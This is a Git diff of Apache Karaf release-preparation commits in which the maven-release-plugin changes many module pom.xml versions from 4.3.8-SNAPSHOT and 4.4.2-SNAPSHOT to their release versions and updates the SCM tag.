pom.xml+2 −2 modified@@ -31,7 +31,7 @@ <groupId>org.apache.karaf</groupId> <artifactId>karaf</artifactId> <packaging>pom</packaging> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <name>Apache Karaf</name> <inceptionYear>2007</inceptionYear> @@ -84,7 +84,7 @@ <connection>${scm.connection}</connection> <developerConnection>${scm.developerConnection}</developerConnection> <url>${scm.url}</url> - <tag>HEAD</tag> + <tag>karaf-4.3.8</tag> </scm> <distributionManagement>
profile/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf</groupId> <artifactId>karaf</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
scheduler/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf</groupId> <artifactId>karaf</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
scr/management/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.scr</groupId> <artifactId>scr</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
scr/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf</groupId> <artifactId>karaf</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
scr/state/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.scr</groupId> <artifactId>scr</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
service/core/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.service</groupId> <artifactId>service</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
service/guard/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.service</groupId> <artifactId>service</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
service/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf</groupId> <artifactId>karaf</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
services/coordinator/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <artifactId>karaf</artifactId> <groupId>org.apache.karaf</groupId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../../pom.xml</relativePath> </parent>
services/eventadmin/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <artifactId>karaf</artifactId> <groupId>org.apache.karaf</groupId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../../pom.xml</relativePath> </parent>
services/interceptor/api/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.services</groupId> <artifactId>org.apache.karaf.services.interceptor</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
services/interceptor/impl/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.services</groupId> <artifactId>org.apache.karaf.services.interceptor</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
services/interceptor/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.services</groupId> <artifactId>services</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
services/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf</groupId> <artifactId>karaf</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
services/staticcm/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <artifactId>karaf</artifactId> <groupId>org.apache.karaf</groupId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../../pom.xml</relativePath> </parent>
shell/commands/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.shell</groupId> <artifactId>shell</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
shell/console/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.shell</groupId> <artifactId>shell</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
shell/core/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.shell</groupId> <artifactId>shell</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
shell/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf</groupId> <artifactId>karaf</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
shell/ssh/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.shell</groupId> <artifactId>shell</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
shell/table/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.shell</groupId> <artifactId>shell</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
specs/activator/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.specs</groupId> <artifactId>specs</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> </parent> <artifactId>org.apache.karaf.specs.activator</artifactId>
specs/java.xml/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.specs</groupId> <artifactId>specs</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> </parent> <artifactId>org.apache.karaf.specs.java.xml</artifactId>
specs/java.xml.ws/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.specs</groupId> <artifactId>specs</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> </parent> <artifactId>org.apache.karaf.specs.java.xml.ws</artifactId>
specs/locator/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.specs</groupId> <artifactId>specs</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> </parent> <artifactId>org.apache.karaf.specs.locator</artifactId>
specs/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf</groupId> <artifactId>karaf</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
subsystem/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf</groupId> <artifactId>karaf</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> </parent> <groupId>org.apache.karaf.subsystem</groupId>
system/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf</groupId> <artifactId>karaf</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
tooling/karaf-maven-plugin/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.tooling</groupId> <artifactId>tooling</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
tooling/karaf-services-maven-plugin/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.tooling</groupId> <artifactId>tooling</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
tooling/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf</groupId> <artifactId>karaf</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
tooling/utils/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.tooling</groupId> <artifactId>tooling</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> </parent> <artifactId>org.apache.karaf.tools.utils</artifactId>
util/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf</groupId> <artifactId>karaf</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
webconsole/console/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.webconsole</groupId> <artifactId>webconsole</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
webconsole/features/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.webconsole</groupId> <artifactId>webconsole</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
webconsole/gogo/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.webconsole</groupId> <artifactId>webconsole</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
webconsole/http/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.webconsole</groupId> <artifactId>webconsole</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
webconsole/instance/pom.xml+1 −1 modified@@ -19,7 +19,7 @@ <parent> <groupId>org.apache.karaf.webconsole</groupId> <artifactId>webconsole</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
webconsole/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf</groupId> <artifactId>karaf</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
web/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf</groupId> <artifactId>karaf</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
wrapper/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf</groupId> <artifactId>karaf</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
10b09eaf4da3[maven-release-plugin] prepare release karaf-4.4.2
245 files changed · +246 −246
archetypes/assembly/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf</groupId> <artifactId>archetypes</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> </parent> <groupId>org.apache.karaf.archetypes</groupId>
archetypes/blueprint/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf</groupId> <artifactId>archetypes</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
archetypes/bundle/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf</groupId> <artifactId>archetypes</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
archetypes/command/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf</groupId> <artifactId>archetypes</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
archetypes/feature/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf</groupId> <artifactId>archetypes</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
archetypes/kar/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf</groupId> <artifactId>archetypes</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
archetypes/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf</groupId> <artifactId>karaf</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
assemblies/apache-karaf-minimal/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.assemblies</groupId> <artifactId>assemblies</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
assemblies/apache-karaf/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.assemblies</groupId> <artifactId>assemblies</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
assemblies/features/base/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.assemblies.features</groupId> <artifactId>features</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
assemblies/features/enterprise/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.assemblies.features</groupId> <artifactId>features</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
assemblies/features/framework/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.assemblies.features</groupId> <artifactId>features</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
assemblies/features/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.assemblies</groupId> <artifactId>assemblies</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
assemblies/features/specs/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.assemblies.features</groupId> <artifactId>features</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
assemblies/features/spring-legacy/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.assemblies.features</groupId> <artifactId>features</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
assemblies/features/spring/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.assemblies.features</groupId> <artifactId>features</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
assemblies/features/standard/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.assemblies.features</groupId> <artifactId>features</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
assemblies/features/static/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.assemblies.features</groupId> <artifactId>features</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
assemblies/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf</groupId> <artifactId>karaf</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
audit/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf</groupId> <artifactId>karaf</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
bom/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf</groupId> <artifactId>karaf</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
bundle/blueprintstate/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.bundle</groupId> <artifactId>bundle</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
bundle/core/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.bundle</groupId> <artifactId>bundle</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
bundle/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf</groupId> <artifactId>karaf</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
bundle/springstate/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.bundle</groupId> <artifactId>bundle</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
client/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf</groupId> <artifactId>karaf</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
config/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf</groupId> <artifactId>karaf</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
deployer/blueprint/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.deployer</groupId> <artifactId>deployer</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
deployer/features/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.deployer</groupId> <artifactId>deployer</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
deployer/kar/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.deployer</groupId> <artifactId>deployer</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
deployer/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf</groupId> <artifactId>karaf</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
deployer/spring/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.deployer</groupId> <artifactId>deployer</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
deployer/wrap/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.deployer</groupId> <artifactId>deployer</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
diagnostic/boot/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.diagnostic</groupId> <artifactId>diagnostic</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
diagnostic/core/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.diagnostic</groupId> <artifactId>diagnostic</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
diagnostic/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf</groupId> <artifactId>karaf</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
docker/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf</groupId> <artifactId>karaf</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
event/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <artifactId>karaf</artifactId> <groupId>org.apache.karaf</groupId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-blueprint-example/karaf-blueprint-example-client/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-blueprint-example</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-blueprint-example/karaf-blueprint-example-common/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-blueprint-example</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-blueprint-example/karaf-blueprint-example-features/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-blueprint-example</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-blueprint-example/karaf-blueprint-example-provider/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-blueprint-example</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-blueprint-example/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>apache-karaf-examples</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-branding-example/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>apache-karaf-examples</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-bundle-example/karaf-bundle-example-client/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-bundle-example</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-bundle-example/karaf-bundle-example-common/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-bundle-example</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-bundle-example/karaf-bundle-example-features/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-bundle-example</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-bundle-example/karaf-bundle-example-provider/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-bundle-example</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-bundle-example/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>apache-karaf-examples</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-camel-example/karaf-camel-example-blueprint/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-camel-example</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-camel-example/karaf-camel-example-features/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-camel-example</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-camel-example/karaf-camel-example-java/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-camel-example</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-camel-example/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>apache-karaf-examples</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-cdi-example/karaf-cdi-example-api/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-cdi-example</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-cdi-example/karaf-cdi-example-consumer/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-cdi-example</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-cdi-example/karaf-cdi-example-features/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-cdi-example</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-cdi-example/karaf-cdi-example-provider/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-cdi-example</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-cdi-example/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>apache-karaf-examples</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-command-example/karaf-command-example-api/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-command-example</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-command-example/karaf-command-example-command/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-command-example</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-command-example/karaf-command-example-features/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-command-example</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-command-example/karaf-command-example-provider/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-command-example</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-command-example/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>apache-karaf-examples</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-config-example/karaf-config-example-blueprint/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-config-example</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-config-example/karaf-config-example-features/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-config-example</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-config-example/karaf-config-example-listener/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-config-example</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
